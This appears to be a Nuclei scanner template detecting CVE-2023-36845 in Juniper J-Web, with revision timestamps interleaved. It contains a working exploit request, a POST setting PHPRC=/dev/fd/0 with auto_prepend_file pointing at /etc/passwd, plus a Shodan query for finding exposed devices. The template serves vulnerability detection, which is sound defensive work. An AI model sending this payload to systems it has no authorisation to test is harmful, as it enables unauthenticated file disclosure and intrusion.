2023-09-19 01:54:05 +00:00
id : CVE-2023-36845
info :
name : Juniper J-Web - Remote Code Execution
author : yaser_s
2023-10-14 11:27:55 +00:00
severity : critical
2023-09-19 01:54:05 +00:00
description : |
A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
2023-09-19 01:54:05 +00:00
reference :
- https://vulncheck.com/blog/juniper-cve-2023-36845
- https://nvd.nist.gov/vuln/detail/CVE-2023-36845
- https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/
2023-10-14 11:27:55 +00:00
- http://packetstormsecurity.com/files/174865/Juniper-SRX-Firewall-EX-Switch-Remote-Code-Execution.html
- https://supportportal.juniper.net/JSA72300
2023-09-19 01:54:05 +00:00
classification :
2023-10-14 11:27:55 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2023-09-19 01:54:05 +00:00
cve-id : CVE-2023-36845
cwe-id : CWE-473
2023-11-14 14:37:18 +00:00
epss-score : 0.69312
2024-01-14 13:49:27 +00:00
epss-percentile : 0.97711
2023-09-19 01:54:05 +00:00
cpe : cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*
metadata :
verified : true
max-request : 1
vendor : juniper
product : junos
shodan-query : title:"Juniper Web Device Manager"
2024-01-14 09:21:50 +00:00
tags : cve,cve2023,packetstorm,rce,unauth,juniper,kev
2023-09-19 01:54:05 +00:00
http :
- raw :
- |
POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
auto_prepend_file="/etc/passwd"
matchers-condition : and
matchers :
- type : regex
part : body
regex :
- "root:.*:0:0:"
- type : word
part : body
words :
- "Juniper"
- type : status
status :
- 200
2024-01-26 08:31:11 +00:00
# digest: 4a0a00473045022100d0b807462fd2f740b6f35584821ecfcf41b62f92b2d611633a88ce0956d97ccc02202e8a6c9210020dea7ac6831519e021a0a8c55e8fac3baf8525bcb12e15dd4fcd:922c64590222798bb761d5b6d8e72950